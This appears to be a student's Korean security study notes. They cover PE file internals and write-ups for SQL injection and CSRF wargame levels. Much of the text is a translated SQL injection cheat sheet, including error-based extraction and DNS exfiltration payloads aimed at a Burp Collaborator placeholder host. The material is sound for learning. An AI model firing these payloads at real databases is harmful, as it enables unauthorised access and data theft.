윱

PE의 기본 구조

섹션 헤더

섹션 헤더: 각 섹션의 속성(property)을 정의한 것

• 섹션을 나눠둔 이유?
  • 프로그램의 안정성을 위해 
  • 따라서 각 섹션의 속성을 기술할 섹션 헤더가 필요해짐.
  • code, data, resource 마다 각자의 특성, 접근 관한 등을 다르게 설정할 필요가 있음.
  • 파일/메모리에서 시작 위치, 크기, 엑세스 권한 등 각 섹션의 정보와 속성, 접근 권한을 정리해서 섹션 헤더에 넣어둠.

• 섹션 헤더는 각 섹션별 IMAGE_SECTION_HEADER의 구조체 배열로 이루어짐
• Virtual Size: 메모리에서 섹션이 차지하는 크기
• Virtual Address: 메모리에서 섹션의 시작 주소(RVA)
• SizeOfRawData: 파일에서 섹션이 차지하는 크기
• PointerToRawData: 파일에서 섹션의 시작 위치
• Characteristics: 섹션의 속성(bit OR)

→ VirtualAddress와 PointerToRawData는 아무 값이 아니라 앞에 정의된 SectionAlignment와 FileAlignment에 맞게 결정.

일반적으로 VirtualSize와 SizeOfRawData는 서로 다른 값

(파일에서 섹션의 크기와 메모리에 로딩된 섹션의 크기는 다르기 때문에)

• NT HEADER의 Characterisitc 항목처럼 다 더해서 나타낸다.

• PE 스펙에는 Name을 지을 때 규칙이 없다.
• 데이터 섹션 이름을 .code로 해도 실행이 된다.
• 따라서 정보가 아니라 그냥 참고용으로 봐야 한다.

• 여기서 'IMAGE'는 파일에서 PE와 메모리에서 PE가 모양이 다르기 때문에, '메모리에 로딩된 PE의 상태'를 가리킨다.
• 그래서 메모리에 로딩된 PE가 시작하는 지점 = ImageBase
• 각 섹션의 메모리 로딩 이후 메모리 주소와 파일 오프셋을 잘 매칭시킬 수 있다면 도움이 됨!

RVA to RAW

• RVA to RAW: RVA가 속한 섹션을 찾아서 RAW를 위의 비례식으로 계산

• 먼저 해당 RAV값이 속한 섹션을 찾아야 한다.
  • RVA 5000 → 첫번째 텍스트 섹션에 속해있다. (ImageBase 01000000을 고려해서 VA를 구할 수 있음)
• 비례식에 따라 계산
  • RAW = 5000(RVA) - 1000(VirtualAddress, 메모리에서 헤더-텍스트 섹션까지의 거리)+400(PointerToRawData) = 4400
  • VirtualAddress가 1000인 이유는 Memory에서 첫 번째 Section이 01001000에서 시작하므로 1000이다. (ImageBase 값을 빼면) PointerToRawData 값이 400인 이유는 File에서 첫 번째 Section이 00000400에서 시작하기 때문이다.

섹션

• 섹션헤더들이 섹션 테이블에 정리되어 있고, 프로그램 실행 시 로더가 각 섹션을 메모리에 로드하고 속성을 설정할 때 필요한 정보들이 담겨있다.

• 프로그램마다 있는 섹션도 있고 없는 섹션도 있는데 .text 섹션은 모두 포함하고 있다.

IAT와 EAT

• IAT(Import Address Table): 프로그램이 어떤 라이브러리에서 어떤 함수를 사용하고 있는지를 기술한 테이블
• DLL(Dynamic Linked Library): 동적 연결 라이브러리의 준말
• 등장 배경
  • 16비트 DOS에서는 실행파일에 모든 라이브러리 함수의 바이너리 코드를 가지고 있었음.
  • 32비트 윈도우 환경을 제대로 지원하기 위해서는 기본적으로 매우 많은 라이브러리 함수(process, memory, window, message)가 사용됨.
  • 이것이 멀티태스킹을 지원하는 Windoes OS에서는 심각한 메모리/디스크 낭비가 됨.
  • 그래서 한번 로딩된 DLL의 코드, 리소스를 Memory mapping 기술로 여러 프로세스에서 공유해서 사용하는 DLL 개념 등장

→ 프로그램에 라이브러리를 포함시키지 않고, 별도의 파일(DLL)로 구성해 필요할 때 쓰는 DLL 개념이 등장함.

이러면 라이브러리가 업데이트되어도 해당 DLL 파일만 교체하면 되므로 매우 편하다.

DLL 로딩 방식

• Explicit Linking(명시적 링킹): 프로그램에서 사용되는 순간 로딩되고 사용이 끝나면 메모리에서 해제되는 방법
• Implicit Linking(묵시적 링킹): 프로그램 시작 시 로딩되어 프로그램 종료할 때 메모리에서 해제됨

→ IAT는 Implicit Linking에 대한 메커니즘을 저장한 형태

Explicit Linking이 쓸 때만 연결하니까 보안적으로 훨씬 안전하기 하지만, 준비해야 할 것이나 요건이 많아서 난이도가 높다.

1. CreateFileW를 호출함
2. 01001104의 값을 가져와서 호출함
3. .text 섹션의 메모리 영역에 위치한 01001104 주소에는 7C8107F0이 저장되어 있음
4. 7C8107F0 주소에는 notepad.exe의 프로세서 메모리에 로딩된 kernel32.dll의 CreateFileW 함수가 들어있음

Call 7C8107F0이라고 안하고 이런 귀찮은 형태를 취하는 이유:
재배치 문제도 있고 프로그램 실행 환경에 따라 kernel32.dll의 버전이 달라지고, CreateFileW의 주소도 달라지기 때문에 실제 주소가 저장될 위치(01001104)를 준비하고, 명령어에 변수로 이 주소를 넣어둠.
그리고 파일이 실행되는 순간, PE 로더가 01001104 위치에 CreateFileW의 위치를 입력해 주는 것.
cf) dll은 위치가 달라지고, exe는 imagebase가 있기 때문에 정확히 로딩된다.

IMAGE_IMPORT_DESCRIPTOR

• IMPORT_DATA_DESCRIPTOR 자료구조에는 실행파일이 참조하는 DLL(Dynamic Link Library), API와 관련된 정보들이 명시되어 있음.
• Import는 library에게 서비스(함수)를 제공받는 일이고, Export는 library 입장에서 다른 PE에게 서비스(함수)를 제공하는 일임
• 라이브러리 마다 이 구조체가 만들어지고, 이 라이브러리를 import 하는 프로그램의 import 테이블에 이 구조체가 속함.
• 보통 프로그램은 여러 개의 라이브러리를 import 하므로, 라이브러리 개수만큼 이 구조체가 배열에 들어있고, 이 배열의 마지막은 NULL 구조체로 끝남.
• 따라서 import 테이블의 전체 엔트리 개수는 import 한 DLL+1

임포트 함수 주소를 IAT에 입력

<PE로더가 임포트 함수 주소를 IAT에 입력하는 기본적인 순서>

1. IID의 Name 멤버를 읽어서 라이브러리의 이름 문자열(kernel32.dll)을 얻음
2. 해당 라이브러리를 로딩함 → LoadLibrary("kernel32.dll")
3. IID의 OriginalFirstThunk 멤버를 읽어서 INT 주소를 얻음
4. INT에서 배열의 값을 읽어와서 해당 IMAGE_IMPORT_BY_NAME 주소(RVA)를 얻음
5. IMAGE_IMPORT_BY_NAME의 Hint(Original)나 Name 항목을 이용해서 해당 함수의 시작 주소를 얻음 → GetProcAddress("GetCurrentThreadld")
6. IID의 FirstThunk(IAT) 멤버를 읽어서 IAT 주소를 얻음
7. 해당 IAT 배열 값에 위에서 구한 함수 주소를 입력함
8. INT가 끝날 때까지 (NULL을 만날 때까지 위 과정을 반복함)

원래 INT와 IAT의 내용물은 완전히 똑같음.

PE로더가 IID의 OriginalFirstThunk를 타고 INT 주소를 알아내고, INT에서 IMAGE_IMPORT_BY_NAME의 주소를 알아오고, GetProcAddress(“GetCurrentThreadId”) 함수를 이용해서 함수의 실제 주소(로딩된 주소)를 알아옴.

그리고 그것을 IAT에 입력함. 그래서 INT를 가리키는 멤버는 originalfirstthunk인거고, IAT를 가리키는 멤버는 그냥 firstthunk 멤버인 것.

• lMAGE_OPTIONAL_HEADER32.DataDirectory[1].Virtual Address값이 실제 lMAGE_IMPORT _DESCRIPTOR의 시작주소
• IMAGE_IMPORT_DESCRIPTOR 구조체 배열을 다른 말로 IMPORT directory table이라고도 함.
• 이 구조체 배열은 PE헤더가 아니라 바디에 위치함. 지난번에 배운 optional header의 datadirectory 중 import table의 값이 여기서 IMAGE_IMPORT_DESCRIPTOR를 가리키고 있는 것!

https://jamielim.tistory.com/54

1. ctf 3문제 Write-up 작성

https://los.rubiya.kr/gate.php

# LORD OF SQLINJECTION - gremlin

• 먼저 코드를 분석한 결과 사용자 입력 값 $_GET['id']와 $_GET['pw']를 그대로 쿼리에 넣고 있다는 것을 알아냈습니다.
• 입력값이 직접 SQL 쿼리로 들어가기 때문에 SQL Injection에 취약할 수 있다.

• SQL 삽입 공격 중 가장 일반적인 ' or '1'=1 방법을 시도하여 항상 참인 조건을 만들어 모든 레코드를 가져오게 하려고 ?id=' OR '1'='1&pw=' OR '1'=1로 쿼리문을 변경했고 그 결과 문제를 해결했습니다.

# LORD OF SQLINJECTION - cobolt

• 먼저 코드를 분석한 결과 id가 'admin'으로 충족만 하면 pw는 고려 안 해도 된다는 것을 알아냈습니다.

• 처음에 id가 admin이면 충족이 되겠다는 생각에 ?id=admin을 넣었지만 pw을 충족하지 못해 해결이 되지 않았습니다.
• 그래서, id값이 충족만 되면 되니깐 뒤 pw를 주석처리를 해서 무시를 해야겠다는 생각에 주석처리 #을 사용했지만 처리되지 않았습니다.
• 찾아본 결과 #은 urlencoding방식으로 %23라고 적어줘야 한다는 것을 알아냈습니다.
• ?id=admin'%23 넣었더니 문제를 해결했습니다.

# Dreamhack: csrf-1

https://dreamhack.io/wargame/challenges/26

문제 설명

여러 기능과 입력받은 URL을 확인하는 봇이 구현된 서비스입니다.

CSRF 취약점을 이용해 플래그를 획득하세요.

 

• 먼저 각 페이지를 확인해 봤더니 vuln(csrf) page는 csrf 파라미터로 alert(1)를 실행하는 스크립트 구문을 전달하고 script 구문이 필터링된 것을 볼 수 있었습니다.

• memo 페이지는 memo 파라미터로 hello를 전달하고 hello를 출력한다.

• notice flag페이지는 admin 계정 권한에 속해있고 Access Denied 문구가 출력됐습니다.

• flag 페이지는 코드를 기입할 수 있다는 것을 확인했습니다.

@app.route("/memo")
def memo():
    global memo_text
    text = request.args.get("memo", None)
    if text:
        memo_text += text
    return render_template("memo.html", memo=memo_text)


@app.route("/admin/notice_flag")
def admin_notice_flag():
    global memo_text
    if request.remote_addr != "127.0.0.1":
        return "Access Denied"
    if request.args.get("userid", "") != "admin":
        return "Access Denied 2"
    memo_text += f"[Notice] flag is {FLAG}\n"
    return "Ok"

• 그다음, 코드를 분석했더니 userid가 admin일 때 /memo 페이지에 플래그가 추가된다는 것을 알아냈습니다.

<img src="/admin/notice_flag?userid=admin">

• 코드를 /flag 페이지에 넣어서 실행했더니 플래그를 얻을 수 있었습니다! 

2. sql injection에 주로 사용되는 구문에 대해서 정리

참조 사이트: https://portswigger.net/web-security/sql-injection/cheatsheet

String concatenation

여러 문자열을 연결해 하나의 문자열로 만듭니다.

Oracle 

• 'foo'||'bar'
  : 두 개 이상의 문자열 연결 || 연산자로 연결

Microsoft 

• 'foo'+'bar'
  : 두 문자열을 + 연산자로 연결

PostgreSQL 

• 'foo'||'bar'
  : Oracle처럼 || 연산자를 사용하여 문자열을 연결

MySQL 

• 'foo' 'bar' [Note the space between the two strings]
  : 공백을 통해 문자열 연결
• CONCAT('foo','bar')
  
  

Substring

문자열에서 지정된 위치와 길이만큼 부분 문자열을 추출합니다.

형식: (원본 문자열, 시작 오프셋, 추출할 길이)

첫 인덱스는 0이 아니라 1부터 시작한다.

Oracle 

• SUBSTR('foobar', 4, 2)

Microsoft 

• SUBSTRING('foobar', 4, 2)

PostgreSQL 

• SUBSTRING('foobar', 4, 2)

MySQL 

• SUBSTRING('foobar', 4, 2)

Comments 

주석을 사용하여 쿼리를 잘라내고 입력 내용 뒤에 오는 원래 쿼리의 일부를 제거할 수 있습니다.

Oracle 

• --comment
  : 단일 행 주석

Microsoft 

• --comment
  :단일 행 주석
• /*comment*/
  : 여러 줄 주석

PostgreSQL 

• --comment
• /*comment*/
  
  

MySQL 

• #comment
  :단일 행 주석에 주로 사용
• -- comment [Note the space after the double dash]                                                                                                          : -- 다음에 공백 삽입 후 comment입력
• /*comment*/

Database version

데이터베이스를 쿼리 하여 유형과 버전을 확인할 수 있습니다.

이 정보는 더 복잡한 공격을 공식화할 때 유용하다.

Oracle 

• SELECT banner FROM v$version                                                                                                                                 : Oracle 데이터베이스의 버전 정보를 표시
• SELECT version FROM v$instance
  : 현재 인스턴스의 버전 정보를 가져옵니다.

Microsoft 

• SELECT @@version
  : SQL Server의 버전 정보를 반환

PostgreSQL 

• SELECT version()
  : PostgreSQL 서버의 버전 정보를 확인

MySQL 

• SELECT @@version
  : MySQL 서버의 버전 정보를 출력

Database contents

데이터베이스에 존재하는 테이블과 해당 테이블에 포함된 열을 나열할 수 있습니다.

Oracle 

• SELECT * FROM all_tables
  : 모든 테이블의 목록을 가져옵니다.
• SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
  : 지정한 테이블 이름에 해당하는 테이블의 모든 컬럼(열) 정보를 조회.

Microsoft 

• SELECT * FROM information_schema.tables
  : 데이터베이스 내에서 사용 가능한 모든 테이블에 대한 정보를 가져옵니다.
• SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
  : 지정된 테이블에서 사용할 수 있는 모든 컬럼 정보를 반환.

PostgreSQL 

• SELECT * FROM information_schema.tables
  : 모든 테이블에 대한 정보를 조회.
• SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
  : 지정된 테이블의 모든 컬럼 정보를 반환.

MySQL 

• SELECT * FROM information_schema.tables
  : 지정된 테이블의 모든 컬럼 정보를 반환.
• SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
  : 지정된 테이블의 모든 컬럼 정보(이름, 데이터 유형, 길이 등)를 반환.

Conditional errors

단일 부울 조건을 테스트하고 조건이 참이면 데이터베이스 오류를 발생

Oracle 

• SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN TO_CHAR(1/0) ELSE NULL END FROM dual
  : 주어진 조건이 참일 경우 1을 0으로 나누는 계산을 시도하여 오류를 발생시킵니다. 조건이 거짓일 경우 NULL을 반환하여 오류가 발생하지 않도록 합니다. dual은 Oracle에서 단일 행을 반환하는 임시 테이블로 자주 사용

Microsoft 

• SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END
  : 주어진 조건이 참이면 1을 0으로 나누는 연산을 수행하여 오류를 발생시킵니다. 조건이 거짓일 경우 NULL을 반환하여 정상적으로 처리.

PostgreSQL 

• 1 = (SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/(SELECT 0) ELSE NULL END)
  : 조건이 참일 때, 0으로 나누기 연산을 시도하여 오류를 발생시킵니다. 거짓일 경우 NULL이 반환되며, 오류 없이 실행.  1 = (SELECT...)의 결과는 항상 FALSE.

MySQL 

• SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')
  : 주어진 조건이 참이면 information_schema.tables에서 테이블 이름을 반환하려고 시도하며, 조건이 거짓이면 단순히 'a'라는 문자열을 반환합니다. 이는 데이터베이스 상태를 확인하거나 테이블을 반환하는 로직을 이용한 공격에 응용

Extracting data via visible error messages

악의적인 쿼리를 통해 오류 메시지를 유도하여 민감한 데이터가 노출될 수 있습니다.

Microsoft 

• SELECT 'foo' WHERE 1 = (SELECT 'secret')
  : 이 쿼리는 'foo' 문자열을 선택하는데, 조건 1 = (SELECT 'secret')이 참이어야 결과가 반환. 그러나 서브쿼리에서 'secret' 문자열이 반환되고, SQL Server는 숫자와 문자열을 비교할 수 없기 때문에 변환 오류가 발생. 이 오류 메시지는 데이터베이스에서 특정 데이터를 노출할 수 있으며, 이 경우 'secret'이라는 문자열이 유출
• > Conversion failed when converting the varchar value 'secret' to data type int.
  : 오류 메시지 - "varchar 값 'secret'을 데이터 유형 int로 변환하는 동안 오류가 발생했습니다."

 PostgreSQL 

• SELECT CAST((SELECT password FROM users LIMIT 1) AS int)                                                                            : 이 쿼리는 users 테이블에서 첫 번째 password 값을 가져와 정수로 변환하려고 시도합니다. 하지만 비밀번호가 문자열로 저장되어 있을 가능성이 높기 때문에 변환 과정에서 오류가 발생합니다. 이때, 오류 메시지에 비밀번호 값이 포함될 수 있습니다.
• > invalid input syntax for integer: "secret"
  : 오류 메시지 - "정수에 대한 입력 구문이 잘못되었습니다: 'secret'"

 
MySQL 

• SELECT 'foo' WHERE 1=1 AND EXTRACTVALUE(1, CONCAT(0x5c, (SELECT 'secret')))
  : 이 쿼리는 조건이 참일 때 'foo'를 반환하지만, EXTRACTVALUE 함수가 XML 경로와 데이터를 처리하는 데 사용됩니다. 이 쿼리에서는 0x5c(역슬래시)와 서브쿼리의 결과('secret')를 결합하여 XML 경로로 처리하려고 시도합니다. 잘못된 XML 경로가 제공되면 오류가 발생하며, 이 과정에서 'secret' 문자열이 노출될 수 있습니다. > XPATH syntax
• error: '\secret'
  : 오류 메시지 - "XPATH 구문 오류: '\secret'"

Batched (or stacked) queries

배치 쿼리를 사용하면 여러 쿼리를 연속으로 실행할 수 있습니다. 그러나 후속 쿼리의 결과는 애플리케이션으로 반환되지 않습니다. 따라서 이 기술은 주로 블라인드 취약점과 관련이 있으며, 두 번째 쿼리를 사용하여 DNS 조회, 조건부 오류, 또는 시간 지연을 유발할 수 있습니다.

Oracle 

• Does not support batched queries.
  : Oracle은 배치 쿼리를 지원하지 않으므로, 여러 쿼리를 한 번에 실행하는 방식은 사용할 수 없습니다. 즉, 여러 개의 SQL 명령어를 한 번에 실행할 수 있는 방법이 없으며, 쿼리마다 별도로 실행해야 합니다.

Microsoft 

• QUERY-1-HERE; QUERY-2-HERE 
  : 이 쿼리는 세미콜론(;)으로 구분된 두 개의 쿼리를 순차적으로 실행합니다. 예를 들어, SELECT 1; SELECT 2;처럼 쿼리 두 개를 한 번에 실행할 수 있습니다. 첫 번째 쿼리의 결과는 애플리케이션으로 반환되지만, 두 번째 쿼리는 실행만 되고 결과는 반환되지 않습니다. 이를 통해 공격자는 여러 명령어를 순차적으로 실행하여 시스템에 영향을 미칠 수 있습니다.
• QUERY-1-HERE QUERY-2-HERE                                                                                                                                   : SQL Server에서는 때때로 세미콜론 없이도 여러 쿼리를 순차적으로 실행할 수 있습니다. 두 명령이 바로 연결되어 실행되며, 첫 번째 명령만 결과로 반환되고 두 번째 명령은 비밀리에 실행

PostgreSQL 

• QUERY-1-HERE; QUERY-2-HERE
  : 세미콜론(;)을 사용하여 여러 쿼리를 배치 실행할 수 있습니다. 예를 들어, SELECT 1; SELECT 2;와 같이 두 쿼리를 연속으로 실행하면 첫 번째 쿼리의 결과만 반환되고 두 번째 쿼리는 실행만 됩니다.

MySQL 

• QUERY-1-HERE; QUERY-2-HERE
  : 세미콜론을 사용하여 여러 쿼리를 연속 실행할 수 있지만, 일반적으로 MySQL의 기본 설정에서는 배치 쿼리를 SQL 인젝션에서 사용할 수 없습니다.

Note
: MySQL에서는 일반적으로 배치 쿼리를 SQL 인젝션에 사용할 수 없습니다. 그러나, 타깃 애플리케이션이 특정 PHP 또는 Python API를 사용하여 MySQL 데이터베이스와 통신하는 경우 가끔씩 가능할 수 있습니다.

Time delays

쿼리가 처리될 때 데이터베이스에서 시간을 지연시킬 수 있습니다.

아래 쿼리들은 조건 없이 10초의 지연을 발생시킵니다.

Oracle 

• dbms_pipe.receive_message(('a'),10)
  : dbms_pipe.receive_message는 일반적으로 프로세스 간 통신에 사용되며, 첫 번째 인수로 메시지 이름을, 두 번째 인수로 대기 시간을 설정

Microsoft 

• WAITFOR DELAY '0:0:10'
  : 여기서 '0:0:10'은 10초 동안의 지연을 의미하며, 이를 통해 10초 동안 데이터베이스 처리를 지연.

PostgreSQL 

• SELECT pg_sleep(10)
  : pg_sleep 함수를 사용하여 10초 동안 데이터베이스 처리를 지연시킬 수 있습니다. 이 함수는 입력한 초만큼 대기 시간을 설정.

MySQL 

• SELECT SLEEP(10)
  : SLEEP 함수를 사용하여 입력 값으로 지정된 시간만큼 지연되며, 여기서 10은 10초를 의미.

Conditional time delays

단일 부울 조건을 테스트하여, 조건이 참일 경우 시간 지연을 발생시킬 수 있습니다

Oracle 

• SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual
  : 이 쿼리는 조건이 참일 때 10초 동안 지연을 유발합니다. CASE문을 사용하여 조건을 평가하며, 조건이 참이면 dbms_pipe.receive_message(('a'),10)을 호출하여 10초 지연을 발생시킵니다. 'a'||는 문자열 연결을 사용한 방법으로, 지연이 발생할 때 단일 값을 반환하도록 하는 데 사용.

Microsoft 

• IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'
  : 특정 조건이 참일 때 10초 동안 대기하게 합니다. IF문을 사용하여 조건을 평가하고, 조건이 참일 경우 WAITFOR DELAY '0:0:10' 명령을 실행하여 10초 지연을 발생시킵니다.

PostgreSQL 

• SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END
  : 조건이 참일 경우 pg_sleep(10)을 호출하여 10초 지연을 유발하고, 거짓일 경우 pg_sleep(0)을 호출하여 지연 없이 바로 응답을 반환.

MySQL 

• SELECT IF(YOUR-CONDITION-HERE,SLEEP(10),'a')
  : IF 함수를 사용하여 조건이 참일 때 SLEEP(10)을 호출해 10초 동안 지연을 발생시킵니다. 조건이 거짓일 경우 'a'라는 문자열을 반환하며, 지연 없이 응답을 받습니다.

DNS lookup

데이터베이스가 외부 도메인으로 DNS 조회를 수행하도록 할 수 있습니다.

Oracle

• (XXE) vulnerability to trigger a DNS lookup. The vulnerability has been patched but there are many unpatched Oracle installations in existence:
  XXE(External XML Entity) 취약점을 통해 DNS 조회를 유발할 수 있습니다. 이 취약점은 패치되었으나, 여전히 많은 Oracle 설치 버전이 패치되지 않은 상태
• SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual
  : XML 외부 엔터티(XML External Entity, XXE) 취약점을 악용하여 BURP-COLLABORATOR-SUBDOMAIN으로 DNS 조회를 유발합니다. XML 형식의 데이터를 xmltype으로 변환한 후, 외부 엔터티를 선언하여 시스템에서 정의된 외부 자원을 로드.

• The following technique works on fully patched Oracle installations, but requires elevated privileges:
  패치된 Oracle 설치에서 사용할 수 있는 방법은 다음과 같습니다. 그러나 고급 권한이 필요하다.
  
  • SELECT UTL_INADDR.get_host_address('BURP-COLLABORATOR-SUBDOMAIN')                                        : 이 쿼리는 UTL_INADDR 패키지의 get_host_address 함수를 사용하여 BURP-COLLABORATOR-SUBDOMAIN 도메인의 IP 주소를 조회하려고 시도합니다. 서버는 도메인 이름을 확인하는 과정에서 DNS 요청을 발생

 
Microsoft 

• exec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a'
  : SQL Server에서 파일 시스템 명령어를 실행하는 xp_dirtree 저장 프로시저를 이용하여 DNS 요청을 유발합니다. //BURP-COLLABORATOR-SUBDOMAIN/a 경로는 원격 서버에 연결되며, 서버는 이 경로를 탐색하려고 시도하면서 DNS 조회를 발생시킵니다. 이를 통해 외부 서버에서 네트워크 요청이 확인.

 
PostgreSQL 

• copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'
  : PostgreSQL에서 외부 프로그램을 실행하기 위해 copy 명령어를 사용합니다. nslookup 프로그램을 실행하여 BURP-COLLABORATOR-SUBDOMAIN 도메인의 DNS 정보를 조회하려고 시도합니다. 이 과정에서 서버가 외부 DNS 서버로 요청을 보내므로, 공격자는 이를 통해 서버의 외부 통신을 확인.

 
MySQL

• The following techniques work on Windows only:
   Windows 환경에서만 작동
• LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a')                                                                                        : LOAD_FILE 함수를 사용하여 원격 서버에서 파일을 로드하려고 시도합니다. 경로에 있는 \\\\BURP-COLLABORATOR-SUBDOMAIN\\a는 네트워크 공유를 통해 접근하려는 경로이며, 서버가 이 경로를 탐색하려고 할 때 DNS 조회가 발생
• SELECT... INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'
  : INTO OUTFILE 명령을 사용하여 쿼리 결과를 외부 파일로 저장하려고 시도합니다. 저장 경로로 지정된 \\\\BURP-COLLABORATOR-SUBDOMAIN\\a는 외부 네트워크 상의 경로로, MySQL 서버가 파일을 쓰려고 시도하면서 DNS 요청을 발생.

DNS lookup with data exfiltration

데이터베이스가 삽입된 쿼리의 결과를 포함하는 외부 도메인으로 DNS 조회를 수행하도록 할 수 있습니다.

Oracle 

• SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual
  : XML 외부 엔터티(XML External Entity, XXE) 취약점을 이용하여, YOUR-QUERY-HERE 쿼리의 결과를 포함한 DNS 요청을 발생시킵니다. EXTRACTVALUE 함수는 XML 데이터를 처리하고 결과를 반환합니다. xmltype으로 변환된 XML 내에서 YOUR-QUERY-HERE 쿼리의 결과를 포함한 URL을 생성하여 Burp Collaborator 하위 도메인으로 DNS 요청을 전송.

 
Microsoft

declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.BURP-COLLABORATOR-SUBDOMAIN/a"')

: YOUR-QUERY-HERE 쿼리의 결과를 변수 @p에 저장한 후, xp_dirtree 명령어를 사용하여 해당 결과를 Burp Collaborator 하위 도메인에 연결된 경로를 통해 접근.

 
PostgreSQL

create OR replace function f() returns void as $$
declare c text;
declare p text;
begin
SELECT into p (SELECT YOUR-QUERY-HERE);
c := 'copy (SELECT '''') to program ''nslookup '||p||'.BURP-COLLABORATOR-SUBDOMAIN''';
execute c;
END;
$$ language plpgsql security definer;
SELECT f();

: YOUR-QUERY-HERE 쿼리의 결과를 변수 p에 저장합니다. 이후 nslookup 명령어를 사용하여 BURP-COLLABORATOR-SUBDOMAIN으로 DNS 요청을 전송하는 copy 명령어를 생성합니다. 이 쿼리는 security definer로 설정되어 있으며, 호출한 사용자 대신 함수를 정의한 사용자의 권한으로 실행.

 
MySQL

• SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'
  : YOUR-QUERY-HERE의 결과를 BURP-COLLABORATOR-SUBDOMAIN 경로에 있는 파일로 저장하려고 시도합니다. INTO OUTFILE 명령은 결과를 파일로 출력.

3. https://sqlzoo.net/wiki/SELECT_from_Nobel_Tutorial 사이트 문제 풀고 인증

# Notepad Quiz-1

먼저 HxD 프로그램으로 notepad.exe와 notepad_quiz(1) 파일을 열고 둘을 비교하면서 분석을 해보았습니다!

notepad_quiz(1) 같은 경우에는 앞아 e_magic("MZ") 대신에 EVI$ION이 있다는 걸 확인했습니다.

EVI$ION을 MZ로 바꿔서 저장을 해준 뒤 cmd를 통해 실행을 했더니 정상적으로 메모장이 실행되었습니다!

# Notepad Quiz-2

notepad_quiz(2)도 똑같이 HxD프로그램으로 열고 비교하면서 분석을 했습니다.

quiz2는 앞에 e_magic이 빠진 걸 확인했고 헤더의 끝부분에 000000E0으로 e_lfanew가 설정되어 있지 않다는 것도 확인을 했습니다.

그리고, 시그니처 PE가 빠져있다는 것도 알아냈습니다.

그래서, e_magic, e_lfanew, 시그니처를 설정을 다 하고 저장을 한 뒤

cmd로 실행하니 정상적으로 메모장이 실행되었습니다.

# Notepad Quiz-3

정상적인 notepad.exe 파일과 비교를 하니 Offset 00000130 0B 부분에 02 대신에 01이 들어가 있다는 것을 알아냈고

그래서 02로 다시 수정을 하고 실행을 해보니 정상적으로 메모장이 실행되었습니다.

# Notepad Quiz-4

정상적인 notepad.exe 파일과 비교를 하니 Offset 000000E0 06 부분에 03 대신에 02가 들어가 있다는 것을 알아냈고

그래서 03으로 다시 수정을 하고 실행을 해보니 정상적으로 메모장이 실행되었습니다.

PE파일 개요

PE파일이란?

• 윈도우 운영체제에서 사용되는 실행파일 형식
• 그냥 PE파일은 32bit, 64bit 형태의 실행파일은 PE+, PE32+로 불린다.
• OBJ 파일을 제외하고 모두 실행 가능한 파일
• DLL, SYS 같은 파일은 셸에서 직접 실행할 순 없지만 서비스, 디버거 같은 방법으로 실행 가능하다.

PE파일 개요

• PE파일의 헤더 부분에는 PE파일이 실행되기 위해 필요한 모든 정보가 적혀있다.
• 메모리에 어떻게 적재되는지, 어디서부터 실행될지, 실행에는 어떤 DLL이 필요하고, 필요한 스택, 힙 메모리의 크기가 얼마인지 등이 PE 헤더에 구조체 형식으로 저장되어 있음
• 동적 라이브러리 정보, API 익스포트 및 임포트 정보, 실행을 위한 코드, 실행에 필요한 리소스 정보 등을 구조화하고 관리하는 방법을 정의하고 있음
• PE파일 포맷을 공부한다 = 인공지능 주요 feature로 사용될 PE헤더 구조체를 공부한다
• Feature: 머신러닝에 사용되는 개별적인 독립변수.
  • feature는 우리가 악성코드인지 아닌지를 가리는 인공지능이 악성코드인지 판별할 때 사용할 정보, 혹은 거기에 도움이 되는 정보
• 구조체: 하나 이상의 변수(포인터 변수, 배열 포함)를 하나로 묶을 수 있는 복합 자료형으로 사용자 정의 자료형이라고도 불림

PE의 기본 구조

PE헤더와 PE바디로 나뉨

• DOS header부터 Section header까지를 PE 헤더라고 하고 그 밑의 섹션을 합쳐서 PE 바디라고 부른다.
• 위치를 표현하는 방법이 파일과 메모리가 다르다
  • 파일 = offset
  • 메모리 = 주소(절대주소)
• 파일을 사용할 때는 파일을 메모리에 로딩시켜서 CPU 자원을 할당한다. 이때 파일이 메모리에 로딩되면 모양(섹션 크기, 위치 등)이 달라짐.
• 파일 내용은 보통 코드(.txt로 된 섹션), 데이터(.data), 리소스(.rsrc) 섹션으로 나뉘어서 저장되고 섹션과 속성이 유사한 데이터들이 포함되어 있다고 보면 된다.
• 섹션 유형이나 개수, 크기는 개발 도구와 빌드 옵션에 따라 달라지고, 중요한 건 각 용도별로 섹션이 여러 개 나뉘어서 저장된다는 것이다.

• 컴퓨터에서 파일, 메모리, 네트워크 패킷 같은 걸 처리할 때 최소 기본 단위 개념을 사용함
• 파일/메모리에서 섹션의 시작 위치는 각 파일 메모리의 최소 기본 단위의 배수에 해당한다.
  • 그래서 시작주소가 배수로 딱딱 끊어지는 걸 확인할 수 있다.
